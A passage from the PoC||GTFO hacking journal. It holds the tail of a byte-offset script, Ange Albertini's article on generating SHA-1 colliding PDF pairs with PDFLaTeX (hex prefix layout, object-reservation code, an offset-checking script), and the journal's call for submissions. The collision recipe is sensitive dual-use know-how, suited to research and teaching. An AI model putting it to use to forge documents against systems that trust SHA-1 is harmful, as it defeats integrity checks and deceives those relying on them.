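        "be 1e df 0f 6f 87 b7 c3 be 1f df 0f 6f 87 b7 c3"
    ),
    0x1000: bytes.fromhex(
        "04 a8 02 54 01 2a 00 95 43 4a 21 a5 10 d2 08 69 "
        "00 04 00 02 80 01 40 00 80 06 40 03 a0 01 50 00 "
        "86 1e c3 0f 61 87 b0 c3 be 1e df 0f 6f 87 b7 c3 "
        "be 1f df 0f 6f 87 b7 c3 9e 1e cf 0f 67 87 b3 c3"
    ),
}


def find_offset(stream: bytes, block: bytes) -> int:
    """Return the byte offset of block inside stream, or -1 if absent."""
    return stream.find(block)


for seed, block in BLOCKS.items():
    offset = find_offset(STREAM, block)
    print(f"SCRMSEED {seed:#x}: offset {offset}")
```

Storing one 96 byte stream plus an offset per seed replaces five separate 64 byte blocks, which is the redundancy the figure is meant to show.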


18:10 Easy SHA-1 Colliding PDFs with PDFLaTeX.
by Ange Albertini

In the summer of 2015, I worked with Marc Stevens on the re-usability of a SHA-1 collision: determining a prefix could enable us to craft an infinite amount of valid PDF pairs, with arbitrary content, with a SHA-1 collision.

    000: .% .P .D .F .- .1 .. .3 \n .% E2 E3 CF D3 \n \n
    010: \n .1    .0    .o .b .j \n .< .< ./ .W .i .d .t
    020: .h    .2    .0    .R ./ .H .e .i .g .h .t    .3
    030:    .0    .R ./ .T .y .p .e    .4    .0    .R ./
    040: .S .u .b .t .y .p .e    .5    .0    .R ./ .F .i
    050: .l .t .e .r    .6    .0    .R ./ .C .o .l .o .r
    060: .S .p .a .c .e    .7    .0    .R ./ .L .e .n .g
    070: .t .h    .8    .0    .R ./ .B .i .t .s .P .e .r
    080: .C .o .m .p .o .n .e .n .t    .8 .> .> \n .s .t
    090: .r .e .a .m \n FF D8 FF FE 00 24 .S .H .A .- .1
    0a0:    .i .s    .d .e .a .d .! .! .! .! .! 85 2F EC
    0b0: 09 23 39 75 9C 39 B1 A1 C6 3C 4C 97 E1 FF FE 01
    0c0: ??

The first SHA-1 colliding pair of PDF files was released in February 2017.[61] I documented the process and the result in my “Exploiting hash collisions” presentation.

The resulting prefix declares a PDF, with a PDF object declaring an image as object 1, with references to further objects 2–8 in the file for the properties of the image:

    PDF signature             000: %PDF-1.3
    non-ASCII marker          009: %âãÏÓ
    object declaration        011: 1 0 obj
    image object properties   019: <</Width 2 0 R/Height 3 0 R/Type 4 0 R
                                   /Subtype 5 0 R/Filter 6 0 R
                                   /ColorSpace 7 0 R/Length 8 0 R
                                   /BitsPerComponent 8>>
    stream content start      08e: stream
    JPEG Start Of Image       095: FF D8
    JPEG comment              097: FF FE 00 24          (length: 36)
    hidden death statement    09b: SHA-1 is dead!!!!!
    randomization buffer      0ad: 85 2F .. .. 97 E1
    JPEG comment              0bd: FF FE 01             (length: 01??)
    start of collision block  0c0: ??                   (byte with a xor difference of 0x0C)

The PDF is otherwise entirely normal. It’s just a PDF with its first eight objects used, and with an image of fixed dimensions and colorspace, with two different contents in each of the colliding files.

The image can be displayed one or many times, with optional clipping, and the raw data of the image can also be used as page content under specific readers (non browsers) if stored losslessly, repeating lines of code eight times.

The rest of the file is totally standard. It could actually be a standard academic paper like this one.

We just need to tell PDFLaTeX that object 1 is an image, that the next seven objects are taken, and do some postprocessing magic: since we can’t actually build the whole PDF file with the perfect precision for hash collisions, we’ll just use placeholders for each of the objects. We also need to tell PDFLaTeX to disable compression in this group of objects.

Here’s how to do it in PDFLaTeX. You may have to put that even before the documentclass declaration to make sure the first PDF objects are not reserved yet.

    \begingroup

      \pdfcompresslevel=0\relax

      \immediate\pdfximage width 40pt {<foo.jpg>}

      \immediate\pdfobj{65535}       %/Width
      \immediate\pdfobj{65535}       %/Height
      \immediate\pdfobj{/XObject}    %/Type
      \immediate\pdfobj{/Image}      %/SubType
      \immediate\pdfobj{/DCTDecode}  %/Filters
      \immediate\pdfobj{/DeviceGray} %/ColorSpace
      \immediate\pdfobj{123456789}   %/Length

    \endgroup

Then we just need to get the reference to the last PDF image object, and we can now display our image wherever we want.

    \edef\shattered{
      \pdfrefximage\the\pdflastximage}

We then just need to actually overwrite the first eight objects of a colliding PDF, and everything falls into place.[62] You can optionally adjust the XREF table for a perfectly standard, SHA-1 colliding, and automatically generated PDF pair.
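
The offsets in the prefix breakdown above can be sanity-checked by rebuilding the first 0xC0 bytes in Python. This is a sketch for checking the layout only, not a collision generator: the variable names are made up for the example, the bytes are transcribed from the hex dump in this article (including the five exclamation marks shown there), and nothing after offset 0xBF is modeled.

```python
prefix = (
    b"%PDF-1.3\n"
    b"%\xe2\xe3\xcf\xd3\n\n\n"
    b"1 0 obj\n"
    b"<</Width 2 0 R/Height 3 0 R/Type 4 0 R"
    b"/Subtype 5 0 R/Filter 6 0 R"
    b"/ColorSpace 7 0 R/Length 8 0 R"
    b"/BitsPerComponent 8>>\n"
    b"stream\n"
    b"\xff\xd8"            # JPEG Start Of Image
    b"\xff\xfe\x00\x24"    # JPEG comment marker, length 0x24 = 36
    b"SHA-1 is dead!!!!!"  # text hidden inside the comment
)
# Randomization buffer that fills the rest of the first comment.
prefix += bytes.fromhex("85 2F EC 09 23 39 75 9C 39 B1 A1 C6 3C 4C 97 E1")
# Second comment marker; its length is 0x01?? with ?? in the collision block.
prefix += b"\xff\xfe\x01"

# Offsets of the landmarks named in the breakdown.
landmarks = {
    "object declaration": prefix.find(b"1 0 obj"),
    "image object properties": prefix.find(b"<<"),
    "stream content start": prefix.find(b"stream"),
    "JPEG Start Of Image": prefix.find(b"\xff\xd8"),
    "hidden death statement": prefix.find(b"SHA-1"),
}
for name, offset in landmarks.items():
    print(f"{name}: {offset:03x}")

# A JPEG comment's length field counts itself, so the next marker
# starts at (offset of length field) + length.
length_field = prefix.find(b"\xff\xfe") + 2
comment_length = int.from_bytes(prefix[length_field:length_field + 2], "big")
print(f"next marker at {length_field + comment_length:03x}, prefix is {len(prefix):03x} bytes")
```

The last check is the reason the randomization buffer is exactly sixteen bytes: it pads the first comment so that the second comment marker lands right before the collision block.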
61 unzip pocorgtfo14.pdf shattered.pdf
62 See https://alf.nu/SHA1 or unzip pocorgtfo18.pdf sha1collider.zip.

18:11 Bring out your dead! Bugs, that is.
from the desk of Pastor Manul Laphroaig,
Tract Association of PoC||GTFO.

Dearest neighbor,
Our scruffy little gang started this самиздат
journal a few years back because we didn’t much like
the academic ones, but also because we wanted to
learn new tricks for reverse engineering. We wanted
to publish the methods that make exploits and poly-
glots possible, so that folks could learn from each
other. Over the years, we’ve been blessed with the privilege of editing these tricks, of seeing them early, and of seeing them through to print.
Now it’s your turn to share what you know, that nifty little truth that other folks might not yet know.
It could be simple, or a bit advanced. Whatever
your nifty tricks, if they are clever, we would like to
publish them.
Do this: write an email in 7-bit ASCII telling
our editors how to reproduce ONE clever, techni-
cal trick from your research. If you are uncertain of
your English, we’ll happily translate from French,
Russian, Southern Appalachian, and German.
Like an email, keep it short. Like an email, you
should assume that we already know more than a
bit about hacking, and that we’ll be insulted or—
WORSE!—that we’ll be bored if you include a long
tutorial where a quick explanation would do.
Teach me how to falsify a freshman physics ex-
periment by abusing floating-point edge cases. Show
me how to enumerate the behavior of all illegal in-
structions in a particular implementation of 6502,
or how to quickly blacklist any byte from amd64
shellcode. Explain to me how shellcode in Wine or
ReactOS might be simpler than in real Windows.
Don’t tell us that it’s possible; rather, teach us
how to do it ourselves with the absolute minimum
of formality and bullshit.
Like an email, we expect informal language and
hand-sketched diagrams. Write it in a single sit-
ting, and leave any editing for your poor preacher-
man to do over a bottle of fine scotch. Send this
to pastor@phrack org and hope that the neighborly
Phrack folks—praise be to them!—aren’t man-in-the-
middling our submission process.

Yours in PoC and Pwnage,


Pastor Manul Laphroaig, T G S B
